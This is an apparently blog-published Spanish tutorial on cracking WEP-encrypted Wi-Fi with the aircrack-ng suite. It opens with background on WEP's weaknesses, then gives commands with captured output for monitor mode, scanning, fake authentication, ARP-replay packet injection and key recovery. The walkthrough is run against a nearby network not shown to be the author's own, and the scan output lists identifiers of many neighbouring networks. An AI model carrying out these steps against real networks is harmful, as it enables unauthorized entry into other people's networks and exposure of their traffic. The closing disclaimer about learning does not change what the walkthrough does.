¿QUE ES WEP?
WEP, acrónimo de Wired Equivalent Privacy o “Privacidad Equivalente a Cableado”, es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4 que utiliza claves de 64 bits (40 bits más 24 bits del vector de iniciación IV) o de 128 bits (104 bits más 24 bits del IV). Los mensajes de difusión de las redes inalámbricas se transmiten por ondas de radio, lo que los hace más susceptibles, frente a las redes cableadas, de ser captados con relativa facilidad. Presentado en 1999, el sistema WEP fue pensado para proporcionar una confidencialidad comparable a la de una red tradicional cableada.
Comenzando en 2001, varias debilidades serias fueron identificadas por analistas criptográficos. Como consecuencia, hoy en día una protección WEP puede ser violada con software fácilmente accesible en pocos minutos. Unos meses más tarde el IEEEcreó la nueva corrección de seguridad 802.11i para neutralizar los problemas. Hacia 2003, la Alianza Wi-Fi anunció que WEP había sido reemplazado por Wi-Fi Protected Access (WPA). Finalmente en 2004, con la ratificación del estándar completo 802.11i (conocido como WPA2), el IEEE declaró que tanto WEP-40 como WEP-104 fueron revocados por presentar fallos en su propósito de ofrecer seguridad. A pesar de sus debilidades, WEP sigue siendo utilizado, ya que es a menudo la primera opción de seguridad que se presenta a los usuarios por las herramientas de configuración de los routers aún cuando sólo proporciona un nivel de seguridad que puede disuadir del uso sin autorización de una red privada, pero sin proporcionar verdadera protección. Fue desaprobado como un mecanismo de privacidad inalámbrico en 2004, pero todavía está documentado en el estándar actual.
WEP es a veces interpretado erróneamente como Wireless Encryption Protocol.
Información que tenemos que leer antes de empezar nada:
Manual Básico (in)seguridad wireless
http://wiki.elhacker.net/seguridad-wireless/introduccion/manual-b%C3%A1sico-inseguridad-wireless
Modo monitor
http://wiki.elhacker.net/seguridad-wireless/introduccion/modo-monitor
Vulnerabilidades del cifrado WEP
http://wiki.elhacker.net/seguridad-wireless/introduccion/vulnerabilidades-del-cifrado-wep
Auditoria wireless: ¿Que tarjeta Wifi debo usar/comprar?
Para empezar tenemos que instalar la suit de aircrack-ng, yo lo voy hacer bajo una distribución Debian.
apt-get install build-essential devscripts dpkg-dev debhelper
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3-2.dsc
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3-2.diff.gz
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3.orig.tar.gz
dpkg-source -x aircrack-ng_1.0~rc3-2.dsc
cd aircrack-ng-1.0~rc3
dpkg-buildpackage
dpkg -i ../aircrack-ng*.deb
Una vez ya instalado activamos el modo monitor.
airmon-ng start wlan0
Se activa en mon0, (esto depende ya de tu tarjeta de red)
Interface Chipset Driver wlan0 Realtek 8187L rtl8187 - [phy0] (monitor mode enabled on mon1) mon0 Realtek 8187L rtl8187 - [phy0]
Empezamos a monitorear.
airodump-ng mon0
Como podemos observar nos muestra todos las redes disponibles que se encuentran a nuestro alrededor. Saldrán varios elementos al que tenemos que prestar atención. BSSID (Una clave estilo Mac), CH (Canal donde donde se encuentra esa red), ENC (Enriptación utilizada) y ESSID (El nombre de la red)
CH 8 ][ Elapsed: 24 s ][ 2011-09-11 11:07 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:16:B6:11:41:68 219 10 0 0 11 54 WPA TKIP PSK Xanikin E0:91:53:0B:C3:BD 204 62 178 7 1 54. WEP WEP WLAN_1E 00:14:7C:48:0C:74 199 4 0 0 11 54. WEP WEP 3Com E0:91:53:13:41:BF 197 3 0 0 4 54. WPA TKIP PSK bucanero 00:1D:60:BD:1A:E1 197 11 0 0 1 54 OPN WebSTAR 5C:33:8E:CF:F2:F2 196 6 0 0 11 54. WPA2 CCMP PSK WNL-3000 00:1D:60:06:B0:52 196 17 0 0 6 54 WEP WEP Webstar 64:68:0C:7E:DF:28 192 3 0 0 6 54 WPA CCMP PSK JAZZTEL_DF27 00:23:54:AF:1C:F2 194 34 29 0 1 54 WPA2 TKIP PSK ONO017166 64:68:0C:4C:C8:2B 192 12 0 0 3 54 WPA TKIP PSK WLAN_C828 00:24:D1:2B:44:BD 191 3 0 0 9 54 WEP WEP GLORIA 00:60:B3:ED:1E:8E 192 4 0 0 10 54. WEP WEP karlkox 00:23:54:AF:1C:F5 187 2 0 0 6 54 WPA2 TKIP PSK ONO807702 64:16:F0:DB:9C:07 184 2 0 0 11 54 WPA2 CCMP PSK vodafone9C06 00:19:70:3D:99:F6 186 4 0 0 6 54. WPA2 CCMP PSK Orange-22d2 40:4A:03:B5:7D:83 183 8 0 0 3 54. WPA TKIP PSK <length: 6> 00:11:F5:EF:DA:21 -1 0 40 7 11 -1 WEP WEP <length: 0> BSSID STATION PWR Rate Lost Packets Probes E0:91:53:0B:C3:BD 00:C0:CA:52:48:30 0 0- 1 5266 4375 00:23:54:AF:1C:F2 00:0C:F6:6A:30:6C -1 1- 0 0 1 00:23:54:AF:1C:F2 00:21:00:1D:1D:FF -1 48- 0 0 25 00:11:F5:EF:DA:21 70:F1:A1:C5:4A:E4 198 0-24 599 44 ^C rokitoh@red-orbita#
Capturamos paquetes:
Sintaxis a utilizar:
airodum-ng -c [ CANAL ] -w [ ESSID ] -bssid [ BSSID ] [ Interfaz ]
Ejemplo:
airodump-ng -c 1 -w WLAN_1E -bssid E0:91:53:0B:C3:BD mon0
CH 1 ][ Elapsed: 1 hour 25 mins ][ 2011-09-11 12:08 ][ fixed channel mon0: 3 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E0:91:53:0B:C3:BD 204 76 43229 348570 49 1 54. WEP WEP OPN WLAN_1E BSSID STATION PWR Rate Lost Packets Probes E0:91:53:0B:C3:BD F4:0B:93:A5:29:C3 194 0-11 0 246
Tenemos que tener en cuenta que tiene que haber un cliente conectado, ya que si no no funcionara, mas adelante publicare otro manual de como crackearla sin tener un cliente conectado.
-c Especificamos el canal.
-w Especificamos ESSID.
–bssid pues se especifica el BSSID como su propio nombre indica.
mon0 Interfaz.
Utilizamos la herramienta airplay-ng para injectar paquetes y así elevar los vectores de inicio de la captura.
aireplay-ng -1 6000 -a [BSSID] -h [TU MAC] [Interfaz ]
Ejemplo:
aireplay-ng -1 6000 – E0:91:53:0B:C3:BD -h 00:c0:ca:52:48:30 mon0
Nos muestra una pantalla como esta:
10:46:20 Sending Authentication Request (Open System) [ACK]
10:46:20 Authentication successful
10:46:20 Sending Association Request [ACK]
10:46:20 Association successful (AID: 1)
-1 6000 Es un tipo de ataque que genera una autenticación falsa con retraso.
-a Es el punto de acces.
-h Es el source, aquí ponemos nuestra MAC address.
mon0 La interfaz que utilizamos.
Si nos fijamos en el terminal donde estamos motorizando los #DATA esta subiendo a mayor velocidad
CH 1 ][ Elapsed: 52 s ][ 2011-09-11 12:09 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E0:91:53:0B:C3:BD 204 66 474 3513 59 1 54. WEP WEP WLAN_1E BSSID STATION PWR Rate Lost Packets Probes E0:91:53:0B:C3:BD 00:24:2C:36:4A:B1 190 0- 1 56 18 E0:91:53:0B:C3:BD F4:0B:93:A5:29:C3 195 0-11 0 1 E0:91:53:0B:C3:BD 00:C0:CA:52:48:30 0 0- 1 188 48496
Para poder ver lo que inyectamos:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h [tu MAC] [INTERFAZ]
Ejemplo:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b E0:91:53:0B:C3:BD -h 00:c0:ca:52:48:30 mon0
Nos debería mostrar una imagen similar a esto:
Cnt 297539 packets…(499 pps)
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = E0:91:53:0B:C3:BD
Dest. MAC = 00:24:2C:36:4A:B1
Source MAC = E0:91:53:0B:B4:1E
0x0000: 0842 3401 0024 2c36 4ab1 e091 530b c3bd .B4..$,6J…S…
0x0010: e091 530b b41e e0e9 8305 2100 ebc7 d402 ..S…….!…..
0x0020: e707 d8a3 3484 90c1 1e02 2c89 8f52 6821 ….4…..,..Rh!
0x0030: f465 304f 23ed e060 c5e2 ccc4 3575 a72a .e0O#..`….5u.*
0x0040: 9627 2c90 .’,.
Use this packet ? y
Saving chosen packet in replay_src-0911-113246.cap
You should also start airodump-ng to capture replies.
Sent 3000 packets…. (500 pps)
Esperamos un rato… nos tenemos que dijar en los #Data como va subiendo, cuando tengamos un numero decente toca pesarle el aircrack-ng para crackear la contraseña, esta en concreto me esta costando un montonazo, no quiere ser crackeada… jajaj
Crackeamos
aircrack-ng -z [BSSID]*.cap
Ejemplo:
aircrack-ng -z WLAN_1E-02.cap
Si nos sale un error como este es que no hemos conseguido suficiente DATAS, así que toca seguir esperando, PACIENCIA!
Failed. Next try with 5000 IVs.
Finalmente la paciencia da sus frutos aunque me a costado esta red.
Aircrack-ng 1.0 rc1
[00:17:52] Tested 139537 keys (got 320792 IVs)
KB depth byte(vote)
0 112/113 EC(322816) 0D(322560) 68(322304) 81(322304) 61(322048) 36(321792) 2D(321536) 3E(321536)
1 17/ 1 23(333824) 28(333312) 0D(333056) 62(333056) B4(332544) 0A(332288) CF(332288) E6(332288)
2 16/ 2 DE(334848) 7B(334080) C4(333568) CF(333312) E1(333312) C6(333056) 25(332544) 37(332544)
3 0/ 2 06(468224) F3(346880) 8D(340992) 83(340480) A7(340480) B6(340480) B9(340224) 3D(339712)
4 11/ 45 06(337664) 71(337408) A8(337408) 15(336640) 80(336384) 90(336384) CA(336128) 26(335872)
KEY FOUND! [XXXXXXXXXX ]
MAS INFORMACIÓN:
La web oficial de aircrack-ng tiene unos muy buenos tutoriales
http://www.aircrack-ng.org/doku.php?id=tutorial
Espero que os sirva de ayuda y este manual es de aprendizaje no para que pitareis wifi para engancharos por el morro.
Un saludo, rokitoh!